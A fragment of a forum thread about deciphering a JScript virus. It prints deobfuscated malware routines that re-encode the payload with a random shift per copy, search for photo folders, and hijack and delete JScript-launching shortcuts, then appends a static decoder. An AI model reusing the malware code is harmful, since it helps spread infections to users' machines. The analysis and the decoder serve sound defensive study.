""; tm = t.length; rac = Math.round(Math.random() * 98) + 1; for (x = 0; x < tm; x++) { num = t.charCodeAt(x) + rac; hx = num.toString(16); if (hx.length < 2) { hx = "0" + hx; } tt += hx; hx = ''; } if (rac < 10) { rac = "0" + rac; } tt += rac; g4 = g1 + tt + gr; return g4; } catch (e) {} } function pe(tar) { onef = false; sfp = a.GetFolder(tar); tgc = new Enumerator(sfp.subFolders); for (; !tgc.atEnd(); tgc.moveNext()) { stc = tgc.item().Name.toLowerCase(); if (stc.search("foto") != -1 || stc.search("photo") != -1 || stc.search("image") != -1 || stc.search("im\u00E1ge") != -1 || stc.search("picture") != -1) { if (onef == false) { sfp = a.GetFolder(tgc.item() + "\\"); } onef = true; } } return sfp; } function shcu() { cshc = ""; lnks = new Enumerator(a.GetFolder(c3).files); for (; !lnks.atEnd(); lnks.moveNext()) { try { lks = lnks.item() + ""; if (lks.substring(lks.length - 4, lks.length).toLowerCase() == ".lnk") { lnka = b.CreateShortcut(lnks.item()).Arguments; if (lnka.search("//E:JScript //B -ns") != -1) { cshc = lnka.substring(lnka.indexOf('"') + 1, lnka.lastIndexOf('"')); a.DeleteFile(lnks.item()); } } } catch (e) {} } return cshc; }
Hello, a question: did you use some program to translate it? If so, which one? If not, how did you translate that whole string, and what language is that code written in (the original one, not the translated one)?
Title: Re: [Help] deciphering a virus
Posted by: Mad Antrax on 8 October 2015, 10:09 am
No program was used. It is all explained on pages 2 and 3.
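As an added example (not code from the thread), here is a static JavaScript decoder for the outer layer that the ci() routine above produces: hex byte pairs followed by a two-digit decimal shift, which the dropper's own loop reverses before calling eval. The sample payload and dropper text below are constructed for this example, not taken from a real file.

```javascript
// Added example (not from the thread): statically decode the first
// obfuscation layer, reversing ci() without ever calling eval.
// Layout of z: hex byte pairs, then a two-digit DECIMAL shift ("rad"/"rac").
// ci() picks a fresh random shift (1..99) each time the dropper copies itself,
// so the hex text differs per copy while this decoder stays the same.
function decodeLayer(z) {
  if (z.length < 2 || z.length % 2 !== 0) throw new Error("bad payload length");
  const shift = parseInt(z.slice(-2), 10);            // last two chars: decimal shift
  if (!(shift >= 1 && shift <= 99)) throw new Error("bad shift: " + z.slice(-2));
  let out = "";
  for (let i = 0; i < z.length - 2; i += 2) {
    const code = parseInt(z.substring(i, i + 2), 16); // one encoded byte
    if (Number.isNaN(code)) throw new Error("non-hex pair at offset " + i);
    out += String.fromCharCode(code - shift);          // undo the additive shift
  }
  return out;
}

// Pull the z="..." payload out of a dropper's text and decode it.
// Uses the same markers ci() uses to find its own payload: 'z="' and '";'.
function decodeDropper(scriptText) {
  const start = scriptText.indexOf('z="');
  if (start === -1) throw new Error('no z="..." payload found');
  const end = scriptText.indexOf('";', start + 3);
  if (end === -1) throw new Error("unterminated payload");
  return decodeLayer(scriptText.substring(start + 3, end));
}

// Constructed sample (not a real dropper): "WScript.Echo(1)" shifted by 5.
const SAMPLE_Z = "5c5868776e7579334a686d742d362e05";
const SAMPLE_DROPPER = 'z="' + SAMPLE_Z + '";ll="";dm=z.length-2;/* ... */eval(ll);';

console.log(decodeDropper(SAMPLE_DROPPER)); // WScript.Echo(1)
```

On a real sample the decoded text is the JScript shown earlier in the thread, which can then be read in an editor instead of being executed.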